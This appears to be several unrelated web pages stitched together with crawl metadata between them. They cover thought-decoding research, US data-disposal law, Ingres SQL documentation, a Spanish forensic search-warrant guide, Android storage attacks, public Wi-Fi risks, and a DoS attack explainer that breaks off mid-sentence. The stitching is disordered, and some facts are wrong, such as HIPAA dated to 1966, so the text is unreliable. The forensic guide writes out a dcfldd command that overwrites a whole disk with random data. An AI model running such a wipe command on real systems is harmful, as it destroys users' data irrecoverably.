has not even started to learn to drive yet.” In different studies, the participants watched videos with no sound at all, and this time the decoder could explain what they were seeing. Although there is still much work to be done and the researchers occasionally encounter difficulties, other researchers in the field have praised the breakthrough as “technically extremely impressive.” It may also be cause for worry given that when you consider mind-reading’s many applications outside of aiding the disabled, they can sound somewhat dystopian. Under the cover of its classified Project MKUltra, the CIA tried for many years to manipulate and read minds. While addressing this issue, one of the authors said, “We take very seriously the concerns that it could be used for bad purposes and have worked to avoid that. We want to make sure people only use these types of technologies when they want to and that it helps them.”
<urn:uuid:725aefdd-33ac-4e72-ad00-22280f72dbc7>
CC-MAIN-2024-38
https://www.ai-demand.com/news/tech-news/artificial-intelligence-news/researchers-combine-ai-and-mri-to-decode-human-thoughts/
2024-09-09T12:56:29Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651098.19/warc/CC-MAIN-20240909103148-20240909133148-00043.warc.gz
en
0.975958
585
2.859375
3
Careless disposal of PII is subject to harsh legal penalties in many countries. Similarly, companies who do not have regimented processes for the retirement of technology and the resident data are also at risk of a loss of reputation, trust, and revenue. In the United States, there are several major laws that businesses need to remain aware of: Privacy Act of 1974 The Privacy Act of 1974 holds certain stipulations for the rights and restrictions on data when it is held by government agencies. It governs the collection, maintenance, use, and dissemination. Essentially, US federal workers must not wilfully disclose information to anyone not entitled to receive it. The Fair and Accurate Credit Transactions Act (FACTA) This law was passed in 2003 and its purpose is to enhance customer protections, mainly those that protect against identity theft. While it meant that the amount of PII required from customers increased, it also gave more protection to that PII when gathered. Penalties for violations of FACTA vary, but wilful violations could amount to penalties within the billions. Gramm-Leach-Bliley Act (GLBA) Also known as the Financial Modernization Act, this law was passed in 1999. It requires US companies to explain how they share and protect personal information and protects financial non-public personal information (NPI). Amongst other specifics, it means that businesses apply special protections to private data in accordance with an information security plan. Punishments for GLBA non-compliance, once proven, are severe. Individuals found in violation face fines of $10,000 for each violation discovered. Organizations face $100,000 for each violation. Health Insurance Portability and Accountability Act (HIPAA) HIPAA came into force in 1966 and covers information regarding health status, care, or payment, setting standards for covered parties and business associates. It only applies to protected health information (PHI). Any organization that houses this kind of data must protect it - during use or disposal. Jail terms are likely and restitution may also need to be paid to affected individuals. However, the penalties brought forth depend on whether the breach was carried out with intent or not and the degree of negligence involved. California Consumer Privacy Act (CCPA) At least 35 states implement their own laws regarding data protection and the CCPA is a well-known one. It has actually influenced other states to create similar laws, which have been implemented in areas such as Maryland, Rhode Island, and Massachusetts among others. Passed in early 2020, the CCPA actually incorporates the foundational principles of GDPR, mirroring its focus on data protection and privacy requirements. Penalties for violations of the CCPA vary, with fines of $2,500 for individual breaches and $7,500 for wilful individual breaches. Similarly, both the Federal Trade Commission (FTC) and the Health Insurance Portability and Accountability Act (HIPAA) also require the proper disposition of information.
<urn:uuid:03e4379d-6a32-47d6-be62-d757ebc0ae6b>
CC-MAIN-2024-38
https://www.aptosolutions.com/what-is-itad
2024-09-11T18:47:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651400.96/warc/CC-MAIN-20240911183926-20240911213926-00743.warc.gz
en
0.956297
609
2.625
3
When the Result Column Data Types Are Unknown In most instances, when executing a dynamically defined SELECT statement, the program does not know the number or types of result columns. To provide this information to the program, first prepare and then describe the SELECT statement. The DESCRIBE statement returns to the program the type description of the result columns of a prepared SELECT statement. After the select is described, the program must dynamically allocate (or reference) the correct number of result storage areas of the correct size and type to receive the results of the select. If the statement is not a SELECT statement, describe returns a zero to the sqld and no sqlvar elements are used. After the statement has been prepared and described and the result variables allocated, the program has two choices regarding the execution of the SELECT statement: • The program can associate the statement name with a cursor name, open the cursor, fetch the results into the allocated result storage area (one row at a time), and close the cursor. • The program can use EXECUTE IMMEDIATE, which allows you to define a select loop to process the returned rows. If the select will return only one row, then it is not necessary to define the select loop.
<urn:uuid:866cc4aa-2201-4b27-afc2-64b74de00bcf>
CC-MAIN-2024-38
https://docs.actian.com/ingres/10S/OpenSQL/When_the_Result_Column_Data_Types_Are_Unknown.htm
2024-09-14T07:51:44Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651559.58/warc/CC-MAIN-20240914061427-20240914091427-00543.warc.gz
en
0.847105
252
2.828125
3
First published January 2010 The expert witness perspective by Joaquim Anguas This article describes the most common schema and basic procedure in which search warrants related to computer evidence are served in Spain from the expert witness perspective, and presents a guide, concrete tools, commands and recommendations oriented to maximize the effectiveness and validity of the action. Procedural law in Spain allows the introduction of facts into a conflict in the form of “expert witnesses proof” (prueba de peritos). In the Spanish Legal System an expert witness is someone that has expert knowledge on a matter related to the case. They can be appointed by court or by the parties in conflict. They issue their results in writing and use to be questioned during the trial act. In Spain a search warrant is a court commission to search for evidence related to a case. They use to be produced in criminal procedures, but Spanish law also allows them as precautionary measures in intellectual property, patents or unfair competition cases. A group of persons leaded by the court clerk to serve a court commission is called a “Comisión Judicial”. In the case of search warrants it is constituted by the court clerk together with law enforcement personnel and/or the expert witness(es) if needed. The court clerk attests the action because he/she can act as a legal authority and takes detailed minutes of the whole procedure. In Spain expert witnesses can be appointed by court to serve search warrants. In civil litigation these actions use to be precautionary measures derived from unfair competition actions. In penal prosecution they use to act in less serious crimes, as secrets’ discovery and revelation. When law enforcement specialized units (terrorism, drugs, economic crime, etc) are investigating more serious crimes, they don’t rely on expert witnesses but usually get coverage from their own units (scientific police). Depending on how the judge envisions the action, constrained on how the part or the attorney requests it, expert witnesses receive an assignment to act as assistants for law enforcement or instead they get the required coverage from them to guarantee the action effectiveness. In the first case it would correspond to a case in which there is a current investigation in place and the second could correspond to precautionary measures requested by the plaintiff. In any case it is advisable to let law enforcement do their job as long as it does not interfere with the court assignment. Expert witnesses have to be and keep independent and impartial during the case. They must disclose any detail that may compromise its independency and/or impartiality and restrain to act in any action they may have any kind of interest in. The court commission must specify in detail what is being searched and what are the means that can be used to serve it. It may include file names, examples of file contents, file hashes (MD5, SHA), if it allows the search and/or seizure of computers, optical media, etc. An expert witness appointed to serve a search warrant will have to respond of the outcome of the action and needs to plan it well because these kinds of duties don’t forgive errors easily. In non computer related actions, serving a search warrant is a one step activity. But in this case of study, computer evidence oriented search warrants, the action has to be performed in multiple steps: 1. Material acquisition in the place where the search warrant is served. 2. In-court storage media imaging. 3. Expert witness analysis and result presentation. The reason why it is split in different steps is that media imaging and analysis are time intensive tasks and tactical and practical issues recommend agility in the service of search warrant. Steps 1 and 2 are performed under the court clerk legal authority and control. After reviewing the results presentation, the court may require further iteration of step 3. This article is structured as follows: – Basic procedure. It explains how the action is performed. – Recommendations. Some recommendations regarding how to serve the commission. – Tools and commands. Review of some effective tools and commands. There are different good approaches to this, but it will focus on the use of a computer forensic distribution to boot the target computer and perform the cloning. The directory and file names in the proposed examples have been redacted but results come from real data. Search warrants use to be served in what is called a “commission judicial”. In the proposed scenario it consists of: – A judicial clerk. He/she will inform those receiving the warrant and take detailed minutes of every action performed to serve it. S/he acts as legal authority and can attest the action. – Law enforcement agents. Some of them are agents who have prepared the tactics of the action (identification of persons of interest and places, the best time to conduct the action, etc) and some are from specialized units conducting the investigation of the acts being prosecuted. – One or more expert witnesses. At least one of the expert witnesses is appointed directly from court. The plaintiff may be allowed to appoint an expert witness himself/herself, but s/he has to be properly empowered to be allowed to attend the action. In any case s/he may raise concerns or questions that can get transcript to the minutes but will NOT be allowed to intervene directly in the action. The “commission judicial” gets constituted when all those appointed by the court are present and the judicial clerk starts taking the minutes. Once in the place where the warrant is to be served, law enforcement gets access to the place and identifies the person of interest to receive it. The judicial clerk informs him/her about the circumstances that trigger the action, his/her rights, what is going to be searched and how the action is going to be deployed. The person of interest is asked for computers, storage media or devices that may contain what is being searched. If s/he provides this information, in front of him/her and the judicial clerk, this fact is verified by the expert witness and all gets documented in the minutes. In any case all suspicious media, devices or computers are seized by the expert witness and documented in the minutes, always being proportional, observing the rights of the person receiving the action and obeying what the judge allowed in the search warrant. All seized material is left in an in-court deposit. In-court disk clone Later, the expert witness makes an image copy of the seized material for analysis. The respondent is informed when the copy is being performed and allowed to get a copy at his/her own expense. The image copy is performed in front of the judicial clerk, who takes minutes of the actions performed. Once the copy is finished all seized material returns to the in-court deposit. Analysis and result presentation The expert witness performs the required analysis of the imaged material and presents a report to the court that documents all the process, from the commission constitution to the final result, including all the details that may allow someone else to reproduce all his findings. It is very important that no information unrelated to the search warrant is disclosed in the result presentation, as this may affect the rights of the person suffering the action. It is better to make indications regarding the possible outcome of further analysis and get confirmation from the court before conducting it than releasing information that may affect the rights of the person suffering the measure. It is very important to always keep in mind what the assignment says and what doesn’t. It has to be clear and complete, and if it is not, it is better to seek clarification or raise any concerns to the court in writing. Also, during the action and the results’ presentation, the rights of the person that receives the action have to be kept and the means, actions performed and possible consequences have to be proportional. Preparation is the key to success because while in the action there is not much room for improvisation. 1. You have to get all the information you can regarding the systems you are going to search and/or seize and plan the tools, devices and commands you are going to need to serve the commission. Law enforcement agents or the documentation included in the court proceedings may help you get the case background. 2. Ask the plaintiff (if it is the case) how to identify the object of the search. It is advised that you only get access to the minimum amount of information that identifies the object of the search. If you are searching for a PDF document, the document’s name and the file hash is enough. 3. If you are not familiar with the tools, devices or commands you may need to use, you should not be serving the court commission. If you don’t feel confident, you’d better find someone else to act in your place. You’d better talk to the judge and let someone else with the needed skills do the job. 4. If you do feel confident, practice, practice, practice: set up a test environment and perform the planed actions on them until you feel you can perform them without risks in a hostile environment. Take into account all possible variations that may appear and be prepared for the unexpected. 5. Prepare checklists in advance for the material and actions. 6. Try to get contact with law enforcement personnel serving the action with you. Tell them what your plan is. Listen to them and raise any concern you may have in advance. Don’t leave anything for you that may result in a surprise during the action. 7. Get good rest the night before the action. You’ll need to be alert and agile to respond to the problems you will encounter. Law enforcement uses to bring thin rubber gloves and anti-tampering labels and bags, but you are advised to bring yours just in case. It is advisable to bring material to have some security that you will be able to respond to some eventualities, but not too much: a heavy load will tire you and reduce your mobility and agility. You are not supposed to use these, but just in case: – Mobile access to the internet in case you have to search/download something. – Some forensics distributions in CD and USB format. – A cloning device or an IDE/SATA to USB adapter. – One or more computers (they don’t need a hard drive because you’ll boot them from the forensics distribution if needed). – A power strip. – An Ethernet cable. – A multitool. – Some storage media. – A camera, replacement batteries and its connection cable. – A crossover Ethernet cable. – A flashlight. – A cloth and/or paper tissues. There’s different opinions relating this, but I prefer acting wearing my usual work wear: a suit. Of course you need to feel comfortable working in a suit and expect that you may have to deal with dusty computers and devices, but if you are get to it, in my humble opinion, wearing a suit may help. You are going to get into a place and/or a system the user may not want you in. Getting you access to the place or system and let serve the warrant is law enforcement mission. Let them do their job. Fortunately in countries that are ruled by law the citizen’s rights are preserved. The person suffering the action will have a way to defend his/her point in front of a court. Your presence and attitude has an influence on how the person receiving the action behaves and, what is more important, the way s/he reacts to it and cooperates or otherwise tries to block the action. My advice is that it is better to be straight faced (poker face, not angry), be polite and respectful but firm, show a self-confidence calmed attitude but go straight to work and keep in general a neutral professional attitude. In my experience you use to get what you want if you ask politely. The person receiving the action may get under arrest so s/he can get questioned in law enforcement offices. Some (the less and the more used to it) take it easy, but others don’t. Keep in mind that it is not your fault, your only goal is to serve your assignment while keeping the rights of the parties. If you see any irregularity, you can address the issue in the minutes or in your report to the court. Passwords and encryption keys There might be password protected computers or devices and you may need encryption keys to be able to read the content to perform the commissioned analysis of the seized media. If the computers are turned on, review them for encrypted disks or directories and requests the encryption keys or passwords. Take a dump of the RAM. Tools and commands While there are multiple valid approaches to this, I will focus on booting from a computer forensics distribution for the actions of cloning and analyzing the media seized and using an IDE/SATA to USB adapter. In my experience this is a flexible, solid and convenient approach. Performance is about 80GB/hour. If you serve search warrants frequently you may consider getting a disk cloner. Performance for a cloner is about 250GB/hour. Media clone in court There are two approaches to the cloning: if you only seized the disks but not the complete computer you’ll have to connect them to a cloner or an adapter. If you got the whole computer you may boot it to a forensic distribution and perform the cloning. Most storage media needs disassembly. In the days from the action to the disk clone in court, get all the service manuals of the devices or computers you may have to disassemble. The action is planned in advance and parties can attend and get their own copy. Get to the court on time. The court clerk receives you in court and starts the cloning minutes. S/he gets or requests the computers, devices or storage media from the in-court deposit. Depending on the cloning option you prepared, boot the cloning computer or cloner. If needed, in front of the court clerk, extract the disks from the computer, device or enclosure for cloning and process them one by one taking careful minutes of your actions. Make the court clerk check the computer time and copy the hashes to the minutes. Once finished, sign the minutes. The court clerk takes the devices back to the in-court deposit. Command and options It is recommended to issue a “date” command before and after the cloning command for reference. The command “dcfldd” is an improvement of command “dd” and is used to clone devices. It copies the contents of the whole device, not only the data on in, but also free space. This option indicates not to stop at errors, and if there are errors, add zeros to the result so there are no “holes” left in the resulting image. “hashwindow=0 hashlog=file.txt hash=sha256” This calculates a hash on the fly for the whole operation to file.txt. ubuntu@ubuntu:~$ date; sudo dcfldd if=/dev/sdc of=/media/disk/CASE_ID/LOCATION_ID/DEVICE_ID.dd conv=sync,noerror hashwindow=0 hashlog=DEVICE_ID_md5.txt; date Thu Nov 16 13:18:22 UTC 2009 4883968 blocks (152624Mb) written. 4884090+1 records in 4884091+0 records out Thu Nov 16 15:26:34 UTC 2009 Where CASE_ID is the case identification, LOCATION_ID is the identification for the location where the media was seized and DEVICE_ID is the device identification. Get partition information The result of a “dcfldd” command can be mounted as a loop device. Disk images may contain more than one partition each. In order to mount loopback, you need to know the starting byte for every partition. You can use command parted to list the starting bytes for every partition in a “dcfldd” image file. Start command “parted”, set unit to bytes and print the partition table. ubuntu@ubuntu:/media/disk/CASE_ID/DEVICE_ID$ parted DEVICE_ID.dd WARNING: You are not superuser. Watch out for permissions. Warning: Unable to open /media/disk/CASE_ID/DEVICE_ID/DEVICE_ID.dd read-write (Permission denied). /media/disk/CASE_ID/DEVICE_ID/DEVICE_ID.dd has been GNU Parted 1.7.1 Welcome to GNU Parted! Type ‘help’ to view a list of commands. Unit? [compact]? B Disk /media/disk/CASE_ID/DEVICE_ID/DEVICE_ID.dd: 30005821439B Sector size (logical/physical): 512B/512B Partition Table: msdos Number | Start | End | Size | Type | File system | Flags | 1 | 8225280B | 10487231999B | 10479006720B | extended | lba | | 5 | 8257536B | 10487231999B | 10478974464B | logical | ntfs | | 2 | 10487232000B | 29997596159B | 19510364160B | primary | ntfs | boot | Numbers under the “Start” column are the input for the “mount” command when mounting every partition. As said, in order to mount the result of “dcfldd” you need to provide the starting byte of the partition you got from the “parted” execution. ubuntu@ubuntu:/media/disk/CASE_ID/DEVICE_ID$ sudo mount -r -o loop,offset=10487232000 -t ntfs DEVICE_ID.dd /media/DEVICE_ID This mounts the partition that starts at byte 10487232000 with type NTFS. It is better not to be unnecessary exposed to the contents of the seized media. It is normally useful to create a list of all the disk contents with the MD5 hash calculated so you can search this file without having to see the rest of the disk. ubuntu@ubuntu:/media/DEVICE_ID$ find $@ ! -type d -print0 | xargs -0 md5sum | tee /media/disk/CASE_ID/LOCATION_ID/DEVICE_ID-PARTITION_ID.md5 This calculates the MD5 hash of every file in the partition. After finishing the case, all data has to be effectively erased. A case ends when: – All charges are drop. – There’s a settlement. – There’s a final judgment (res judicata). After the report is presented and while the case is not closed, it is advised to move all data to secondary encrypted storage. ubuntu@ubuntu:/$ sudo dcfldd if=/dev/urandom of=/dev/sda statusinterval=10 bs=10M conv=notrunc This fills the device /dev/sda (the device you want to erase) with random data.
<urn:uuid:4cb2001e-254e-4e58-822e-c8323f289b3f>
CC-MAIN-2024-38
https://www.forensicfocus.com/legal/serving-search-warrants-in-spain/
2024-09-14T08:33:32Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651559.58/warc/CC-MAIN-20240914061427-20240914091427-00543.warc.gz
en
0.929502
4,045
2.671875
3
Man-in-the-Disk is a new attack technique that targets Android storage systems that use insufficient storage protocols in third-party applications. Hackers are taking advantage of these protocols to crash a victims Android mobile device. Hackers are targeting the way in which smartphones and the majority of the mobile devices are handling storage which does not get applied to Androids’ sandbox storage. Researchers from Checkpoint claimed there are vulnerabilities in how Google’s Android OS utilizes external storage resources. This usually occurs when developers are careless about where they store app data. External storage is essentially a partition on the device’s storage card which is shared by all applications. Man-in-the-Disk targets the external disk on mobile devices. “Failing to employ security precautions on their own leaves applications vulnerable to the risks of malicious data manipulation,” the team says. There are some apps that use external storage over internal storage if there is no free storage available on the device. Google suggests that developers should add validation for external storage, the company also says that files should be signed and cryptographically verified before loading dynamically. Some researchers have ironically pointed out that Google are not following their own guidelines since many apps when downloaded may update or receive information from developer servers. Due to prioritisation of external storage, this data may frequently go through external storage before entering the app itself. This could allow for the MiTM attacks in monitoring an app’s online communications between it’s browser and server and allow for tampering of the aforementioned data. Take your time to comment on this article.
<urn:uuid:cd35ef5f-9d0a-4bb0-8a1f-60151dfbe487>
CC-MAIN-2024-38
https://latesthackingnews.com/2018/08/16/android-storage-systems-targeted-by-man-in-the-disk-attacks/
2024-09-15T13:24:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00443.warc.gz
en
0.92531
326
2.578125
3
It can be tempting to connect to the internet using public Wi-Fi networks. Although it’s tempting, it can be a huge mistake. That’s because there are quite a few hazards associated with public Wi-Fi. If you want to protect yourself from all sorts of unpleasant possibilities, then you need to be extra careful about public networks, and avoid them if at all possible. Don’t forget that it’s better to be safe than sorry. Networks That Are Unencrypted Networks that aren’t encrypted can pose a huge problem to people who connect to networks any time they’re out and about in public. Encryption is all about information. If the data that travels between a wireless router and a computer is in a code that’s a mystery, that can stop outside parties from being able to understand it in any sense. If you rely on a public network for Wi-Fi, then you have absolutely no way to confirm whether a network is encrypted or not. That can give you a sense of apprehension that’s unrivaled. If you don’t want to obsess over the dangers of others being able to get their hands on your information, then you should take the encryption route no matter what. That usually isn’t possible on public networks. The Headaches of Malware Malware is and has long been a huge headache for people who have concerns that relate to cyber security matters. Attackers have the ability to basically insert malware into other peoples’ computers. If you don’t want to be the innocent recipient of malware of any kind, then you should resist the urge to rely on public Wi-Fi networks at all costs. It can be problematic to have a software program or an operating system that’s in any sense susceptible to all kinds of undesirable situations that may be on the horizon. Hackers can take full advantage of any things that make people susceptible to malware woes. They can pen codes that zero in on designated negative points. That’s how they can place malware straight onto others’ devices. There are many questionable hotspots out there at this moment in time. These hotspots for all intents and purposes scam people into going for networks that are in no sense credible. If a name gives off an air of authenticity, that can spell bad news for people. People should never put their confidence in names that just don’t seem sketchy. Names are simple to emulate, after all. If you see the name of a famed corporation, don’t assume that it’s necessarily tied to a network. It could be fraudulent. People depend on passwords for all sorts of online tasks day in and day out. It can be a disaster to realize that a hacker has secured yours for any questionable application. If you want to protect yourself from all kinds of password headaches, you should steer clear of public Wi-Fi networks. Looking for more cybersecurity tips to help keep you and your devices safe online? Contact the experts at tekRESCUE, a cybersecurity company near Austin, TX, to learn how we can help.
<urn:uuid:df369999-e84a-4fbf-95bb-0491a21fad96>
CC-MAIN-2024-38
https://mytekrescue.com/dangers-of-public-wi-fi/
2024-09-09T14:25:56Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00143.warc.gz
en
0.932478
645
2.6875
3
Denial of service attacks pose a significant threat to online services, with the power to disrupt and disable critical operations. This guide uncovers the numerous tactics attackers use, the motivations behind their malicious activities, and provides actionable strategies to fortify your network against these insidious threats. Exploring the Mechanics of Denial of Service (DoS) Attacks At the heart of a DoS attack lies a simple yet devastating goal: to render a machine or network resource unavailable, plunging online services into the dark. These attacks, characterized by their sudden and unannounced onset, can strike like a bolt from the blue, leaving services inaccessible and users in disarray. Whether by flooding services with a deluge of excessive traffic or by exploiting vulnerabilities to trigger a crash, the mechanics of DoS attacks are as varied as they are harmful. Comprehending the strategies behind these disruptions is comparable to a military general analysing the tactics of an adversary. From overload-based attacks that sap server memory and CPU power to sophisticated methods that cripple a system’s ability to process legitimate requests, the arsenal used in DoS attacks is both broad and insidiously creative. A deeper dive into these mechanisms sheds light on their operation and provides valuable insights for strengthening our defences against them. The Flood: Overwhelming Traffic Tactics In the realm of DoS, flood attacks stand as a brute force tactic, aiming to submerge a server’s capacity under waves of attack traffic, leaving no room for legitimate users to get through. Imagine legions of soldiers charging a fortress, with the sheer number of attackers forcing the gates open. In the digital world, this is mirrored by SYN flood attacks, where attackers barrage a server with connection requests and then ignore the server’s attempts to respond, quickly depleting the pool of available connections. Another notorious strategy is the Smurf attack, a cyber equivalent of a malicious echo. Here, attackers send a barrage of ICMP packets with a falsified return address to network broadcast addresses. The network unwittingly amplifies the traffic by responding to all devices, creating a torrent of data aimed back at the victim’s server, overwhelming it to the point of paralysis. Exploitation of Weaknesses While flood attacks pound at the gates, other DoS tactics are more akin to a lock-picker, exploiting vulnerabilities to infiltrate and incapacitate systems. Attacks such as Teardrop and the notorious ping of death exploit system weaknesses by sending malformed payloads that confuse and overwhelm the target, causing system crashes or resource exhaustion. These insidious assaults target the very fabric of network communication protocols, such as the TCP in Shrew attacks, or exploit security vulnerabilities to compromise remote management interfaces in Permanent Denial of Service (PDoS) attacks. Manipulating network data handling to induce system crashes or denial of service, these attacks reveal the critical importance of robust system software and responsive security measures. One such example is a denial of service attack, where attackers can trigger a denial of service by sending oversized or mangled packets that the system cannot handle, underscoring the necessity of vigilance and proactivity in cybersecurity. Malicious Traffic Management The management of malicious traffic in DoS attacks is a dark art, where attackers meticulously craft and direct spoofed packets to disrupt their targets. This cyber treachery can take the form of nuke attacks that use invalid ICMP packets to cause mayhem or DNS amplification attacks that exploit public DNS servers to amplify the assault. Like an orchestra conductor, the malicious actor meticulously arranges the flow of attack traffic to maximize disruption. However, it’s not all doom and gloom. Defenders have tools at their disposal, such as: The Motivations Behind Launching DoS Attacks While it’s vital to understand the mechanics of DoS attacks, it’s equally informative to comprehend their underlying motivations. Attackers launch these digital sieges driven by a spectrum of motivations, including: The goals behind such an attack are as diverse as the methods employed. The chaos that ensues during a DoS attack can serve as a smokescreen, allowing attackers to infiltrate systems and inflict financial damage that can average tens of thousands of dollars per hour during a DDoS attack. Beyond the immediate impact, DoS attacks can be deeply personal or stem from ideological differences, serving as a proving ground for attackers to flaunt their technical prowess to their peers. Understanding these diverse motivations is not just an academic exercise; it’s a cornerstone of effective cybersecurity, enabling better defences and aiding in the identification of the responsible parties. The Role of Botnets in Amplifying Attacks When it comes to amplifying the destructive force of a DoS attack, botnets are the weapon of choice for cybercriminals. These networks of compromised personal devices are like sleeper cells, awaiting commands to unleash a deluge of fake requests and spam on other devices and servers. By commandeering the processing power of thousands or even millions of bots, attackers can magnify the scale of a DDoS attack to catastrophic levels. These botnets can be controlled through a centralised server or a peer-to-peer model, offering resilience against countermeasures. Their creation serves a range of purposes, from activism to state-sponsored attacks, and the cost-effectiveness of hiring botnet services is alarmingly disproportionate to the potential scale of damage they can cause. Notably, the infamous Sony PlayStation Network DDoS attack utilised a botnet comprised of IoT devices, chosen for their computational capabilities and often lax security, highlighting the importance of securing all networked devices against such threats. Identifying a DoS Attack: Signs and Symptoms Identifying the symptoms of a DoS attack parallels diagnosing a disease; early detection improves the chances of lessening its impact. Some common symptoms of a DoS attack include: These symptoms can serve as early warning signals of an ongoing DoS attack. Distinguishing between a genuine surge in legitimate traffic and a DoS attack is not trivial; it requires vigilance and an understanding that these symptoms often indicate something far more sinister than routine network issues. By staying alert to such signs and investigating them promptly, organizations can avoid the steep costs associated with mistaking an actual attack for a harmless traffic increase. Traffic Anomalies and Performance Degradation Traffic anomalies and performance degradation are the tell-tale signs of an ongoing DoS attack. When your digital domain suddenly slows to a crawl for routine tasks, it’s time to consider the possibility of an attack. An inability to access certain online resources or a slowdown in the progress of requests are clear indicators of performance issues stemming from malicious activity. To effectively differentiate attack traffic from normal network traffic, sophisticated detection techniques like Network Behavioural Analysis (NBA) are employed. These systems can analyse traffic over time, establishing a baseline and identifying abnormal patterns that could suggest an ongoing attack. While some attacks, like the degradation-of-service or HTTP slow POST DoS attacks, aim to slow down websites rather than crash them, their detection remains a challenge that demands advanced analytics and a keen eye for anomalies. Disrupted Connectivity and Service Availability The hallmark of a DoS attack can be as straightforward as the complete unavailability of a website or an inability to access any online resources, signalling a clear disruption of service. When users are suddenly stripped of their ability to access important web-based accounts and services, it’s a symptom that can’t be ignored. Multiple devices across the same network experiencing connectivity interruptions could all be victims of a DoS attack, emphasising the need for a unified defence strategy. Sometimes, the impact of a DoS attack extends beyond the direct target, affecting entire networks. An organisation’s internet service provider (ISP) might also fall prey to such attacks, leading to a loss of service for the organisation even if it is not the direct target. This ripple effect underscores the importance of cooperative defences and the need for robust communication channels with service providers. Comparing DoS and DDoS: Understanding the Differences DoS and Distributed Denial of Service (DDoS) attacks are often mentioned in the same breath, yet they possess distinct characteristics that set them apart. A DoS attack typically unleashes its fury from a single computer and internet connection, directing a flood of traffic at a server. In contrast, a DDoS attack is the combined effort of multiple systems—a botnet—working in concert to launch a synchronised assault on a single target. The power of a DDoS attack lies in its numbers; with multiple devices contributing to the attack, it can swiftly overwhelm a target’s resources in a more potent and sustained manner compared to a single-source DoS attack. DDoS attacks are also notoriously difficult to counteract due to their distributed nature, making the isolation of the attack source a formidable challenge. Scale and Complexity The scale and complexity of a DDoS attack are what make it particularly menacing. With the potential to generate gigabits or even terabits of data per second, the volume of attack traffic a DDoS can unleash dwarfs that of a DoS attack. The ability to overwhelm target systems more quickly and effectively due to the simultaneous generation of traffic from multiple systems adds to the severity of the threat. DDoS attacks are not just about volume; they’re about coordination. The complexity of these attacks is magnified through the use of multiple compromised devices to form a botnet, orchestrated by a central command-and-control server. This organisational structure enables a level of sophistication and adaptability that makes DDoS attacks particularly challenging to defend against. Tracing the Attackers One of the most daunting tasks in the aftermath of a DDoS attack is tracing the attackers. With multiple compromised devices contributing to the malicious traffic, pinpointing the origin of the attack becomes a herculean task. The process of IP traceback is complicated by the sheer number of bots involved, each potentially masking the true source of the assault. Attackers often use controllers or proxies to command and control their botnets, sending encrypted or obfuscated messages to complicate the tracing process. This starkly contrasts with a DoS attack, which, originating from a single location or internet connection, is naturally easier to detect and neutralise on the target server. Strategies to Mitigate and Respond to DoS Attacks Arming oneself with knowledge of DoS attack tactics is only the first step; developing strategies to mitigate and respond to these attacks is essential for maintaining online fortifications. Here are some strategies to consider: By implementing these strategies, services can be prepared to withstand increased traffic, reduce the service attack surface, and protect against potential service attacks. In the heat of an attack, swift and effective measures are paramount. Utilising external services for upstream filtering can act as a shield, pre-screening incoming traffic to ward off potential threats. Developing a DDoS Response Playbook ensures a coordinated response during an attack and implementing temporary measures can help conserve resources and manage the situation. Implementing Network Safeguards Setting up network safeguards is comparable to building digital fortifications against an encroaching foe. Firewalls and routers, when configured with robust ingress and egress filtering practices, can prevent devices from becoming unwitting soldiers in a botnet army and block traffic from known malicious sources. Rate-limiting, employed at both hardware and software levels, acts as a regulator for the volume of traffic or the number of requests, allowing for measures such as traffic shaping and deep packet inspection to maintain order within the network. In the fight against ping of death attacks, configuring network devices to resist oversized packet reassembly prevents potential buffer overflows, enforcing a maximum size constraint to safeguard the network’s integrity. Moreover, meticulous logging of all changes made during an attack is crucial for post-incident recovery, ensuring systems can be reverted to their known stable state once the digital storm has passed. Deploying Advanced Security Solutions In today’s digitally connected world, advanced security solutions are the vanguard in the battle against DoS attacks. For instance, DDoS protection solutions can shield the connection table from SYN flood attacks by intercepting the flood of attacker’s requests, thus preserving the server’s capacity to handle legitimate connections. Smurf attacks, which exploit network broadcasts, can be mitigated by disabling IP broadcast addressing and utilising services like Cloudflare to filter out the malicious traffic before it wreaks havoc on the server. Modern devices have largely outgrown the susceptibility to traditional ping of death attacks, yet protection services ensure even legacy equipment remains secure by dropping malformed packets. Mitigation techniques for slow POST attacks include enforcing data receipt timeouts and leveraging DDoS protection services for swift detection and blocking. By deploying Mitigation Centers and API gateways, incoming network traffic is scrutinised, safeguarding against DoS/DDoS attacks, while the use of Response Rate Limiters and anti-DDoS appliances provide a robust defence against the tide of abnormal or signature traffic. Preparing for the Worst: DoS Attack Response Planning When the digital skies darken with the threat of a DoS attack, having a robust incident response plan is the beacon that guides an organisation through the storm. This plan should encompass strategies for maintaining service continuity, even in a degraded mode, while under attack, ensuring a graceful rather than catastrophic reduction in service. Utilising a combination of detection, traffic classification, and response tools, the response plan becomes a comprehensive shield against the onslaught of DoS attacks. The effectiveness of a response plan is determined by its meticulous preparation and flawless execution. A well-prepared plan is essential for rapid recovery, reducing the duration and impact of an attack, and sustaining the organisation’s operations amidst cyber adversity. By crafting and regularly updating a response plan that addresses detection, mitigation, and communication, businesses can stand resilient in the face of these digital disruptions. Incident Detection and Analysis In the event of a DoS attack, effective incident detection and analysis are the first lines of defence. Speed and accuracy in identifying a DDoS attack are critical, with out-of-band detection methods using traffic flow records from protocols like NetFlow and sFlow playing a pivotal role in pinpointing the assault. Big data technology and cloud resources enhance the scalability and accuracy of DDoS detection systems, making them formidable adversaries to the stealthy and complex nature of these attacks. Application layer analysis is particularly adept at monitoring request progress and identifying anomalies indicative of an attack. By keeping an eye on key completion indicators, it’s possible to spot the subtle signs of an incipient DoS attack before it fully unfolds. Moreover, while symptoms often resemble common network problems, a discerning analysis can distinguish between benign issues and malicious actions, preventing significant attacks from being dismissed as mere connectivity hiccups. Communication and Recovery Protocols During a DoS attack, lucid communication and recovery protocols serve as the backbone of an organisation’s response initiatives. Internally, timely communication across departments ensures that everyone is aligned and working cohesively to combat the attack. Externally, transparency with customers regarding the impact and expected resolution times is vital for maintaining trust and managing expectations. Utilising multiple communication channels ensures that critical information reaches all affected parties, circumventing the potential disruption of regular communication methods caused by the attack. Establishing alternative methods, such as social media, can provide users with updates on the state of services and guide them towards alternative access points when the primary channels are compromised. We’ve navigated the treacherous waters of DoS attacks, exploring their intricate mechanics, the motivations behind 